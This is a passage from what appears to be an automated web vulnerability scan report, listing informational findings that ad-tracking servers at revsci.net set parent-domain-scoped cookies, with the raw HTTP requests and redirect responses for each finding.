Location: http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?AQB=1&pccr=true&vidn=26E39E5A851D2CAB-6000010360000EE4&&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 01:00:37 GMT
Last-Modified: Tue, 10 May 2011 01:00:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www27
Content-Length: 0
Content-Type: text/plain


12.25. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=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; rsiPus_8M_3="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0s-X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
Set-Cookie: rtc__Lvf=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:09:42 GMT


12.26. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=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; rsi_segs_1000000=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; rsiPus_aQJL="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_JXtz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
Set-Cookie: rtc_2MY1=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:01:07 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:01:06 GMT


12.27. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_M6m_=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; rsiPus_nlnh="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"; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_M6m_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
Set-Cookie: rtc_DsnD=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:17:48 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:17:48 GMT


12.28. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_VOiH=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; rsiPus_0QhP="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn3LMq6VYMHBegA/Z8Ad/QVjxQ2jNsY0ZWD+qEDxiaWPrTwV87vSfczY/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJaL8Z3clgZfjZQfsz2Izvu3lvroVB5Qkq5knhep0fRnij2U5Rhz/Vq0pNRMfJgqDntQNUxuwMuKPi/MV/+D5eTiviMqUVLFajotuW5yMfx/XCoKPsB5uFmJ0aEeYdxcSsloefxMiWADTneb8JcFvWYtzJV7goOlW2IZx/Qe7uHD+WE8DohrAg/IzlnQvpZUk/4nt3G7S1d2+FlWbhTTptTyrmqrUJmLu9d0aNbocdAj+G6puSgbaITB3GNtmbmWvWWYkjJUdAu8bWyz1Vxk9EtoZWN3fQ4moqyebnLZSCFznuaZy3XM1MZ/6UPGDGHg0wxwW93Ub4rBq2yDHcsfYbVyvGXzLw+8b+9UUy9zqBvbciwPhJtnEN2oJ+DSWNdng4kQV2z3lppmGNciKPNvEKlkFUGDPVMAtT9lm7UtaNWxCHXgjOtDbRm+CiahJd7NZgrCqRLfB5y//J0Ufw2gwej267ae86TAzxXu2eN6qgF8dcgK67pb0uoIvBvpTfgwi1pcxvPMCci4Vi8mTRD9tCnSNVAoEbX9LWcwaPN2Q7u7zZIF0oXM2p6RhJVeuJefa0PpIftjz0TCJPHRy7zk/lxwmTTLV3ffe8wrI7wgAyuSZxJ9HAJHIAxBzEkzwZWCcYNelk2KyyMGwsgsHyGpeFNI6jLb9IUyzjd7Cykl5KXX0/7MCFYJZEI97vkjpX7jX+GTSxF6d9Kgn6FEOTsU/uJhGmj59St/BrJxgeq94hjxHaiSpeUeJhZrK/iO6EjtDgbxDO8jw3lV7nyksZqm4f+scdCX8kvHizV60UOU0QXvdGsX83/nBssHBisyFjwXrrxi+1Gcg2/RtGxPxb+aVl2g1cE4B7E+LmhICDn/O5CC+8O5HoLPPyA="; rsi_us_1000000="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"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_VOiH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
Set-Cookie: rtc_IiAg=MLvntzM1ZwprJ5GrFviWjmmgATvNNHGJjojTTrWSZIpIFNkYyjZfNBHlcl0kJ6zHfageWylXbP3wSCPbUS6YYjcsKmrQeOUqyKPcaGszTDTzIh7WtzP5n4+zmZZfmgT5lRj+VfPH65chCW295PBHTclwaYvz/SFH1bidheEC6ZRKt9SG9BW8wwNKY4bJJbonQFHtMUTJpFcuSZbz7kTJnxMUL5KgBaHzjRvnrX6SnFrrchfIM5yjshfapwcb2sNQzbZdjBfasru/cAyP1weNriyPKHNATEhqm48Frl0iQ58XID97HW4ZuelkytTr1rC/Y44WWirvX1n4YT+DONi0LYUryUMomW7rJigm4wWq4rIRbkjgSHhZCCWRyQUFwJAV1ID5hI+aJ6aazd6dtbfN39bi3YdtOqXFXtQA1oZ823p8bU8+95SiLREbVMj4r9fvguEqsb6ZiowiD0QHBR5O7YoGrQTtvt49OFBNALY6xCbDvCZRxcd3PwMbMHF9NmAkKTYba8V7HuVRswXCU8FcQcP/VnsVvebZKb0EM1g01x05ERxj/PWvJb23XMUlVENuV3UxjP7/ReTP933hW1beZhIpumclGw06TmVZf/liRMOjCGGidIRNLkCjxr+jn98gJ60DuWa/6oljSYreAox5hf34+wFu4UMrGRoDMmJA7LZ+pzg7HZsRUu2MzWjCkj/8ilLGHSmlL5arTBlslp16GZkGUbdCuQOVlFSnlI9osJ7qHROvOJZhg2kYof7dNriymTDR4d+g5uaoD9DKAtFuCds/Rc7xVtfeQw4QMbnaY4JllnOKqLPOynBZckcstz/Rie4b4P4ftC2ihuu+hh+tb4xtHsHXUPc4S4kcgMoYU6nDhAG17oc8hRuW5vnXQ8mjCFlmg1AikueTXuw9zaFzxcX2n/5AY6b/9CvUk2jTwvfrs1Zd70/ybVtROyX11nYzYcRFBDcu6y63yS0FvWxXhj23zJyQBUyORdmr8TZe9HKLARFqrE0WgqHy3o4bQOGiuinjnlQO6/Tb6EQqtbqScAcGbOoTuOrGyyrrkhQRvhGP5TddNjuCbLxdI6ExyfhSWnMD5gI9RRANVnvfKpeszlgkjMhHO+AI0RAg1Rnrb694FmmSVopIgyGRfYWjkynQNgJu2WFcRVxyqXdKIg1ngWoCjEvDaqGOV5o+mwsP0WqnIOmypaPth6VviROUBdBqnTYbQpKrGdRSH3Wfsh+/t6tYtduD74mjx0Xqm2pq08w5QcKeM1WKgDKkMJ+XdzqfOAnZd82pKBjE4ORwnukNbnOu7MSSwsL9SL6E1m6fnHLOzNMuGy01wnCq/XskooIWiGeIa++XVGFfQXf7PDHd/Ucx2loESlP3R+oaCchKLj4LZFp4NtIXHvyjIXyP99iHRNx2gZf2aM8ryFP+bp9W3EenSlOtdlCd6kjeE5ZKlRwWat6Qd7j1HhdXSiPKFMAZC/MR350YkTLr27YH04gcO6l0Dkc6qJlOHZIyA2wZYJbumg0oQqkm5O5bX8SVTYKyLJBZj57fPCUUFQ==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:12:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:12:31 GMT


12.29. http://pix04.revsci.net/K10145/a3/0/3/pg.302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fshoppingbasket&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw
+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_dGQ8=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; rsiPus_wuF1="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"; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8